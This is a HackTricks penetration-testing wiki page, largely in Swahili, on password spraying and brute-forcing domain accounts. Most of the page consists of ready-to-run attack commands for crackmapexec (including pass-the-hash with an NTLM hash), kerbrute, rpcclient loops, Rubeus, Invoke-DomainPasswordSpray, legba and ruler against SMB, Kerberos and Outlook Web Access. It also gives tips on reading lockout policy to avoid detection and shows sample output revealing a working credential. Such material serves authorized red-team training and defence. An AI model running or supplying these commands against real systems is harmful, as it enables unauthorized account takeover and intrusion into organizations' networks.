Password Spraying / Brute Force

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

Password Spraying

Mara tu unapokuwa umepata majina halali ya watumiaji kadhaa unaweza kujaribu nenosiri za kawaida zaidi (zingatia sera ya nenosiri ya mazingira) kwa kila mmoja wa watumiaji walio gundulika. Kwa kawaida urefu wa chini wa nenosiri ni 7.

Orodha za majina ya watumiaji wa kawaida pia zinaweza kuwa na manufaa: https://github.com/insidetrust/statistically-likely-usernames

Kumbuka kwamba unaweza kufunga baadhi ya akaunti ikiwa utajaribu nenosiri kadhaa zisizo sahihi (kwa kawaida zaidi ya 10).

Pata sera ya nenosiri

Ikiwa una baadhi ya akreditivu za mtumiaji au shell kama mtumiaji wa kikoa unaweza kupata sera ya nenosiri kwa:

# From Linux
crackmapexec <IP> -u 'user' -p 'password' --pass-pol

enum4linux -u 'username' -p 'password' -P <IP>

rpcclient -U "" -N 10.10.10.10;
rpcclient $>querydominfo

ldapsearch -h 10.10.10.10 -x -b "DC=DOMAIN_NAME,DC=LOCAL" -s sub "*" | grep -m 1 -B 10 pwdHistoryLength

# From Windows
net accounts

(Get-DomainPolicy)."SystemAccess" #From powerview

Utekelezaji kutoka Linux (au yote)

Kutumia crackmapexec:

crackmapexec smb <IP> -u users.txt -p passwords.txt
# Local Auth Spray (once you found some local admin pass or hash)
## --local-auth flag indicate to only try 1 time per machine
crackmapexec smb --local-auth 10.10.10.10/23 -u administrator -H 10298e182387f9cab376ecd08491764a0 | grep +

Kutumia kerbrute (Go)

# Password Spraying
./kerbrute_linux_amd64 passwordspray -d lab.ropnop.com [--dc 10.10.10.10] domain_users.txt Password123
# Brute-Force
./kerbrute_linux_amd64 bruteuser -d lab.ropnop.com [--dc 10.10.10.10] passwords.lst thoffman

spray (unaweza kuashiria idadi ya majaribio ili kuepuka kufungwa):

spray.sh -smb <targetIP> <usernameList> <passwordList> <AttemptsPerLockoutPeriod> <LockoutPeriodInMinutes> <DOMAIN>

Kutumia kerbrute (python) - HAIPENDIWI WAKATI MINGINE HAIFANYI KAZI

python kerbrute.py -domain jurassic.park -users users.txt -passwords passwords.txt -outputfile jurassic_passwords.txt
python kerbrute.py -domain jurassic.park -users users.txt -password Password123 -outputfile jurassic_passwords.txt

Na moduli ya scanner/smb/smb_login ya Metasploit:

Kwa kutumia rpcclient:

# https://www.blackhillsinfosec.com/password-spraying-other-fun-with-rpcclient/
for u in $(cat users.txt); do
rpcclient -U "$u%Welcome1" -c "getusername;quit" 10.10.10.10 | grep Authority;
done

Kutoka Windows

Pamoja na Rubeus toleo lenye moduli ya brute:

# with a list of users
.\Rubeus.exe brute /users:<users_file> /passwords:<passwords_file> /domain:<domain_name> /outfile:<output_file>

# check passwords for all users in current domain
.\Rubeus.exe brute /passwords:<passwords_file> /outfile:<output_file>

Na Invoke-DomainPasswordSpray (Inaweza kuunda watumiaji kutoka kwenye kikoa kwa default na itapata sera ya nywila kutoka kwenye kikoa na kupunguza majaribio kulingana na hiyo):

Invoke-DomainPasswordSpray -UserList .\users.txt -Password 123456 -Verbose

Pamoja na Invoke-SprayEmptyPassword.ps1

Invoke-SprayEmptyPassword

Brute Force

legba kerberos --target 127.0.0.1 --username admin --password wordlists/passwords.txt --kerberos-realm example.org

Outlook Web Access

Kuna zana nyingi za password spraying outlook.

Na MSF Owa_login
na MSF Owa_ews_login
Na Ruler (inaaminika!)
Na DomainPasswordSpray (Powershell)
Na MailSniper (Powershell)

Ili kutumia yoyote ya zana hizi, unahitaji orodha ya watumiaji na nenosiri / orodha ndogo ya nenosiri za kupuliza.

./ruler-linux64 --domain reel2.htb -k brute --users users.txt --passwords passwords.txt --delay 0 --verbose
[x] Failed: larsson:Summer2020
[x] Failed: cube0x0:Summer2020
[x] Failed: a.admin:Summer2020
[x] Failed: c.cube:Summer2020
[+] Success: s.svensson:Summer2020

Google

https://github.com/ustayready/CredKing/blob/master/credking.py

Okta

Marejeo

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Angalia mpango wa usajili!
Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au fuata sisi kwenye Twitter 🐦 @hacktricks_live.
Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.

PreviousPass the Ticket NextPrintNightmare

Last updated 7 days ago